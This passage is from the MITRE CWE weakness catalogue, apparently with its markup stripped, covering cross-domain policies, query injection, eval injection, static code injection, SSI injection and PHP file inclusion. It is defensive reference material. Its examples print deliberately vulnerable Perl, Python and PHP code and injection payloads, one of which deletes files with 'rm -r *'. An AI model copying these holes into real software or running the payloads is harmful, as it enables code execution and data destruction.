Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server. + + + + + These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data: + Flash crossdomain.xml : + + <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"><allow-access-from domain="*.example.com"/><allow-access-from domain="*"/></cross-domain-policy> + + Silverlight clientaccesspolicy.xml : + + <?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="SOAPAction"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true"/></grant-to></policy></cross-domain-access></access-policy> + + These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it. + + + + + CVE-2012-2292 + Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy. + https://www.cve.org/CVERecord?id=CVE-2012-2292 + + + CVE-2014-2049 + The default Flash Cross Domain policies in a product allows remote attackers to access user files. + https://www.cve.org/CVERecord?id=CVE-2014-2049 + + + CVE-2007-6243 + Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks. + https://www.cve.org/CVERecord?id=CVE-2007-6243 + + + CVE-2008-4822 + Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy. + https://www.cve.org/CVERecord?id=CVE-2008-4822 + + + CVE-2010-3636 + Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. + https://www.cve.org/CVERecord?id=CVE-2010-3636 + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2014-06-05 + 2.7 + 2014-06-23 + Created by MITRE with input from members of the CWE-Research mailing list. + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Name + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Overly Permissive Cross-domain Whitelist + + + + The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query. + + Depending on the capabilities of the query language, an attacker could inject additional logic into the query to: + + Modify the intended selection criteria, thus changing which data entities (e.g., records) are returned, modified, or otherwise manipulated + Append additional commands to the query + Return more entities than intended + Return fewer entities than intended + Cause entities to be sorted in an unexpected way + + The ability to execute additional commands or change which entities are returned has obvious risks. But when the product logic depends on the order or number of entities, this can also lead to vulnerabilities. For example, if the query expects to return only one entity that specifies an administrative user, but an attacker can change which entities are returned, this could cause the logic to return information for a regular user and incorrectly assume that the user has administrative privileges. + While this weakness is most commonly associated with SQL injection, there are many other query languages that are also subject to injection attacks, including HTSQL, LDAP, DQL, XQuery, Xpath, and "NoSQL" languages. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Access Control + Bypass Protection Mechanism + Read Application Data + Modify Application Data + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2014-2503 + Injection using Documentum Query Language (DQL) + https://www.cve.org/CVERecord?id=CVE-2014-2503 + + + CVE-2014-2508 + Injection using Documentum Query Language (DQL) + https://www.cve.org/CVERecord?id=CVE-2014-2508 + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + It could be argued that data query languages are effectively a command language - albeit with a limited set of commands - and thus any query-language injection issue could be treated as a child of CWE-74. However, CWE-943 is intended to better organize query-oriented issues to separate them from fully-functioning programming languages, and also to provide a more precise identifier for the many query languages that do not have their own CWE identifier. + + + + CWE Content Team + MITRE + 2014-06-19 + 2.7 + 2014-06-23 + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval"). + This may allow an attacker to execute arbitrary code, or at least modify what code can be executed. + + + + + + Primary + + + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Implementation + This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables. + + + Medium + + + Confidentiality + Read Files or Directories + Read Application Data + The injected code could access restricted data / files. + + + Access Control + Bypass Protection Mechanism + In some cases, injectable code controls authentication; this may lead to a remote vulnerability. + + + Access Control + Gain Privileges or Assume Identity + Injected code can access resources that the attacker is directly prevented from accessing. + + + Integrity + Confidentiality + Availability + Other + Execute Unauthorized Code or Commands + Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. + + + Non-Repudiation + Hide Activities + Often the actions performed by injected control code are unlogged. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + If possible, refactor your code so that it does not need to use eval() at all. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. + Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. + + + + + + edit-config.pl: This CGI script is used to modify settings in a configuration file. + + use CGI qw(:standard); + sub config_file_add_key { + my ($fname, $key, $arg) = @_; + # code to add a field/key to a file goes here + + } + sub config_file_set_key { + my ($fname, $key, $arg) = @_; + # code to set key to a particular file goes here + + } + sub config_file_delete_key { + my ($fname, $key, $arg) = @_; + # code to delete key from a particular file goes here + + } + sub handleConfigAction { + my ($fname, $action) = @_;my $key = param('key');my $val = param('val'); + + # this is super-efficient code, especially if you have to invoke + # any one of dozens of different functions! + my $code = "config_file_$action_key(\$fname, \$key, \$val);";eval($code); + } + $configfile = "/home/cwe/config.txt";print header;if (defined(param('action'))) {handleConfigAction($configfile, param('action'));}else {print "No action specified!\n";} + + The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: + + add_key(",","); system("/bin/ls"); + + This would produce the following string in handleConfigAction(): + + config_file_add_key(",","); system("/bin/ls"); + + Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. + + + This simple script asks a user to supply a list of numbers as input and adds them together. + + + def main(): + + sum = 0 + numbers = eval(input("Enter a space-separated list of numbers: ")) + for num in numbers: + + sum = sum + num + + print(f"Sum of {numbers} = {sum}") + + main() + + + The eval() function can take the user-supplied list and convert it into a Python list object, therefore allowing the programmer to use list comprehension methods to work with the data. However, if code is supplied to the eval() function, it will execute that code. For example, a malicious user could supply the following string: + + __import__('subprocess').getoutput('rm -r *') + + This would delete all the files in the current directory. For this reason, it is not recommended to use eval() with untrusted input. + A way to accomplish this without the use of eval() is to apply an integer conversion on the input within a try/except block. If the user-supplied input is not numeric, this will raise a ValueError. By avoiding eval(), there is no opportunity for the input string to be executed as code. + + + def main(): + + sum = 0 + numbers = input("Enter a space-separated list of numbers: ").split(" ") + try: + + for num in numbers: + + sum = sum + int(num) + + print(f"Sum of {numbers} = {sum}") + + except ValueError: + + print("Error: invalid input") + + + main() + + + An alternative option is to use the ast.literal_eval() function from Python's ast module. This function considers only Python literals as valid data types and will not execute any code contained within the user input. + + + + + CVE-2022-2054 + Python compiler uses eval() to execute malicious strings as Python code. + https://www.cve.org/CVERecord?id=CVE-2022-2054 + + + CVE-2021-22204 + Chain: regex in EXIF processor code does not correctly determine where a string ends (CWE-625), enabling eval injection (CWE-95), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22204 + + + CVE-2021-22205 + Chain: backslash followed by a newline can bypass a validation step (CWE-20), leading to eval injection (CWE-95), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22205 + + + CVE-2008-5071 + Eval injection in PHP program. + https://www.cve.org/CVERecord?id=CVE-2008-5071 + + + CVE-2002-1750 + Eval injection in Perl program. + https://www.cve.org/CVERecord?id=CVE-2002-1750 + + + CVE-2008-5305 + Eval injection in Perl program using an ID that should only contain hyphens and numbers. + https://www.cve.org/CVERecord?id=CVE-2008-5305 + + + CVE-2002-1752 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2002-1752 + + + CVE-2002-1753 + Eval injection in Perl program. + https://www.cve.org/CVERecord?id=CVE-2002-1753 + + + CVE-2005-1527 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2005-1527 + + + CVE-2005-2837 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2005-2837 + + + CVE-2005-1921 + MFV. code injection into PHP eval statement using nested constructs that should not be nested. + https://www.cve.org/CVERecord?id=CVE-2005-1921 + + + CVE-2005-2498 + MFV. code injection into PHP eval statement using nested constructs that should not be nested. + https://www.cve.org/CVERecord?id=CVE-2005-2498 + + + CVE-2005-3302 + Code injection into Python eval statement from a field in a formatted file. + https://www.cve.org/CVERecord?id=CVE-2005-3302 + + + CVE-2007-1253 + Eval injection in Python program. + https://www.cve.org/CVERecord?id=CVE-2007-1253 + + + CVE-2001-1471 + chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement. + https://www.cve.org/CVERecord?id=CVE-2001-1471 + + + CVE-2007-2713 + Chain: Execution after redirect triggers eval injection. + https://www.cve.org/CVERecord?id=CVE-2007-2713 + + + + + Direct Dynamic Code Evaluation ('Eval Injection') + + + A3 + Malicious File Execution + CWE More Specific + + + A6 + Injection Flaws + CWE More Specific + + + SFP24 + Tainted input to command + + + IDS35-PL + Do not invoke the eval form with a string argument + Exact + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Observed_Examples, Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2009-05-27 + updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Name, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Direct Dynamic Code Evaluation ('Eval Injection') + Insufficient Control of Directives in Dynamically Evaluated Code (aka 'Eval Injection') + Improper Sanitization of Directives in Dynamically Evaluated Code ('Eval Injection') + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template. + + + + + + Primary + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Implementation + This issue is frequently found in PHP applications that allow users to set configuration variables that are stored within executable PHP files. Technically, this could also be performed in some compiled code (e.g., by byte-patching an executable), although it is highly unlikely. + + + + + Confidentiality + Read Files or Directories + Read Application Data + The injected code could access restricted data / files. + + + Access Control + Bypass Protection Mechanism + In some cases, injectable code controls authentication; this may lead to a remote vulnerability. + + + Access Control + Gain Privileges or Assume Identity + Injected code can access resources that the attacker is directly prevented from accessing. + + + Integrity + Confidentiality + Availability + Other + Execute Unauthorized Code or Commands + Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. + + + Non-Repudiation + Hide Activities + Often the actions performed by injected control code are unlogged. + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Perform proper output validation and escaping to neutralize all code syntax from data written to code files. + + + + + This example attempts to write user messages to a message file and allow users to view them. + + $MessageFile = "messages.out";if ($_GET["action"] == "NewMessage") {$name = $_GET["name"];$message = $_GET["message"];$handle = fopen($MessageFile, "a+");fwrite($handle, "<b>$name</b> says '$message'<hr>\n");fclose($handle);echo "Message Saved!<p>\n";}else if ($_GET["action"] == "ViewMessages") {include($MessageFile);} + + While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: + + name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E + + which will decode to the following: + + <?php system("/bin/ls -l");?> + + The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. + Notice that XSS (CWE-79) is also possible in this situation. + + + + + CVE-2002-0495 + Perl code directly injected into CGI library file from parameters to another CGI program. + https://www.cve.org/CVERecord?id=CVE-2002-0495 + + + CVE-2005-1876 + Direct PHP code injection into supporting template file. + https://www.cve.org/CVERecord?id=CVE-2005-1876 + + + CVE-2005-1894 + Direct code injection into PHP script that can be accessed by attacker. + https://www.cve.org/CVERecord?id=CVE-2005-1894 + + + CVE-2003-0395 + PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script. + https://www.cve.org/CVERecord?id=CVE-2003-0395 + + + CVE-2007-6652 + chain: execution after redirect allows non-administrator to perform static code injection. + https://www.cve.org/CVERecord?id=CVE-2007-6652 + + + + File or Directory + + + + Direct Static Code Injection + + + SFP24 + Tainted Input to Command + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + "HTML injection" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Enabling_Factors_for_Exploitation, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Direct Static Code Injection + Insufficient Control of Directives in Statically Saved Code (Static Code Injection) + Improper Sanitization of Directives in Statically Saved Code ('Static Code Injection') + + + + The product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Server-Side Includes (SSI) Injection + + + 36 + SSI Injection + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name, Type + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Server-Side Includes (SSI) Injection + Failure to Sanitize Server-Side Includes (SSI) Within a Web Page + + + + The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. + In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP. + + + + + + + + + + + + Remote file include + + + RFI + The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers. + + + Local file inclusion + This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs. + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers. + + + + + Manual Analysis + Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program. + High + + + Automated Static Analysis + + The external control or influence of filenames can often be detected using automated static analysis that models data flow within the product. + Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines. + + + + + + Architecture and Design + Libraries or Frameworks + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + + + Architecture and Design + Enforcement by Conversion + + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Architecture and Design + Operation + Attack Surface Reduction + + Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. + This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. + + + + Architecture and Design + Implementation + Attack Surface Reduction + + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components. + + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + Operation + Implementation + Environment Hardening + Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default. + + + Operation + Implementation + Environment Hardening + + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009. + + + + Operation + Environment Hardening + Set allow_url_fopen to false, which limits the ability to include files from remote locations. + High + Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion. + + + + + The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it. 